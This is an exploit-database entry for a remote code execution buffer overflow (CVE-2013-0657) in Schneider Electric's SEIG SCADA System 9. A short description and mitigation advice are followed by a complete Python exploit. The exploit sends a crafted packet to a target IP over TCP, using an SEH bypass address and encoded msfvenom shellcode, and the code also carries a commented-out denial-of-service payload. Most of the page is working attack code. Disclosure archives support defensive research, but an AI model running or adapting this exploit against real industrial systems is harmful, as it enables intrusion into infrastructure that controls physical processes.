SEIG SCADA SYSTEM 9 - Remote Code Execution

vendor:

SEIG SCADA SYSTEM 9

by:

Alejandro Parodi

7.5

CVSS

HIGH

Remote Code Execution

119

CWE

Product Name: SEIG SCADA SYSTEM 9

Affected Version From: v9

Affected Version To: v9

Patch Exists: NO

Related CWE: CVE-2013-0657

CPE: a:schneider-electric:seig_scada_system:9

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 x86

2018

SEIG SCADA SYSTEM 9 – Remote Code Execution

This exploit allows an attacker to execute remote code on the SEIG SCADA SYSTEM 9. The vulnerability was found by Alejandro Parodi and has a CVE ID of CVE-2013-0657. The exploit takes advantage of a buffer overflow in the software to execute arbitrary code. The vulnerability exists in version 9 of the software and has been tested on Windows 7 x86. The exploit involves sending a specially crafted payload to the target system. The payload includes a header, protocol data, padding, and a return address. A shellcode is also included in the payload, which is responsible for executing the desired code. The exploit has been successfully tested on the specified platform and version.

Mitigation:

To mitigate this vulnerability, it is recommended to update the SEIG SCADA SYSTEM 9 software to a version that includes a patch for CVE-2013-0657. Additionally, it is advisable to implement security measures such as network segmentation and access controls to limit the impact of a potential exploit.

Source

Exploit-DB raw data:

# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/
# Version: v9
# Tested on: Windows7 x86
# CVE: CVE-2013-0657
# References: 
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657

import socket
import struct

ip = "192.168.0.23"
port = 12397
con = (ip, port)

# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER)
# length = "\x00\x70\x00\x00\x00\x00\x00\x00"
# message = "\x00\x70AA\x65\x00\x00\x00AAAAAAAAAAAAAAAA\x00\x00\x00\x00"+"B"*28644
# payload = length+message

# Exploit Magic
message_header = struct.pack("<L", 0x6014) + "\x66\x66\x07\x00"
message_protocol_data = "\x10\x00\x00\x00" + "\x19" + "\x00\x00\x00\x00\x00" + "\x04" + "\x00\x00\x00" + struct.pack(">H", 0x6000)
padding = "B" * 3344
eip_safeseh_bypass_address = struct.pack("<L", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH)

# Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b '\x00\xFF\x0A\x0D' -f python
# If EXITFUNC is not defined the application enter in a Loop that kill the VM resources
nopsleed = "\x41"*100 # \x90 bad char bypass
shellcode  = "\xda\xcb\xbd\x0f\x83\x69\x70\xd9\x74\x24\xf4\x58\x31"
shellcode += "\xc9\xb1\x4b\x83\xe8\xfc\x31\x68\x14\x03\x68\x1b\x61"
shellcode += "\x9c\xa9\xcf\xd8\x3a\xb3\x6e\xfc\x1c\x37\x54\xf6\xc7"
shellcode += "\x93\x5d\x47\xb3\xd2\x35\xb1\x3f\x7d\xdc\x42\xd7\x81"
shellcode += "\x59\x48\x93\x7b\x98\x70\x2a\x6b\x98\x14\xea\xc5\x54"
shellcode += "\x17\x7c\x8d\x25\x69\x60\x27\x1e\xc7\x8a\x6a\xd8\xcf"
shellcode += "\xb6\xc3\x9d\x5a\x83\xd6\xea\x88\x14\x7d\x5a\x55\x71"
shellcode += "\x90\x85\xb8\x37\x9e\x3e\xd7\x1a\x76\xf8\xb1\xb9\x63"
shellcode += "\xb7\xef\xa3\xa6\xc0\xb8\x12\xb4\x18\x62\x1a\xe1\x9e"
shellcode += "\x6f\x7e\xa2\x86\x6c\xf7\x3a\x31\xbd\x55\x42\x10\xad"
shellcode += "\x89\x16\xa0\xb8\x6a\xd6\x4c\x20\xd9\xad\x81\x58\x77"
shellcode += "\x0b\xa3\xaa\xba\x2c\x49\xf0\x26\xaa\xab\xce\x5a\xc3"
shellcode += "\x41\x69\x60\xc4\x58\x71\x71\x9c\x3f\xbe\xc2\xbc\x49"
shellcode += "\xdd\xab\x89\xf0\x46\xcb\x1a\x8a\xf1\xdb\xe5\x54\x1f"
shellcode += "\xfb\x30\x3b\xb1\x17\x97\xb2\x3e\x31\xf8\x26\x13\x9c"
shellcode += "\x16\xdd\x26\x7a\xe3\x9b\x6e\x29\x77\x49\xc7\x97\x98"
shellcode += "\x39\x7b\x5f\xcd\xeb\x4a\x39\x6e\x66\x04\xbc\x6c\xa6"
shellcode += "\x87\x01\x63\x4d\xf3\x35\xc9\x74\x35\xdf\xe7\x1f\x0c"
shellcode += "\xd0\x69\x80\x8c\x5c\xde\x63\xfc\x19\x1b\x8e\x24\x3b"
shellcode += "\x7e\x01\x97\x6f\x67\x8f\x07\x3f\x32\x13\x23\x80\x7e"
shellcode += "\x9a\x01\x5a\xc0\x3c\xf9\xf5\x5a\x04\xb0\x54\x46\x0c"
shellcode += "\xfb\x21\x4d\xd7\xe0\xb4\x02\xe5\x4c\x04\x5a\x5e\x37"
shellcode += "\xd1\x61\x6d\xe1\x4d\xe8\xa8\xdf\x26\xdb\x55\x5a\x60"
shellcode += "\x85\x68\x05\x6a\x21\x73\xdf\x73\xa4\xef\x26\x02\x7e"
shellcode += "\xb0\xb1\xa6\xb1\xac\x15\x0f\x80\x34\xae\xe4\x8a"

JUNK = "JUNK"*5202 # 20808 Bytes of JUNK

payload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK
print "Payload length: "+str(len(payload))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(payload)
s.recv(10)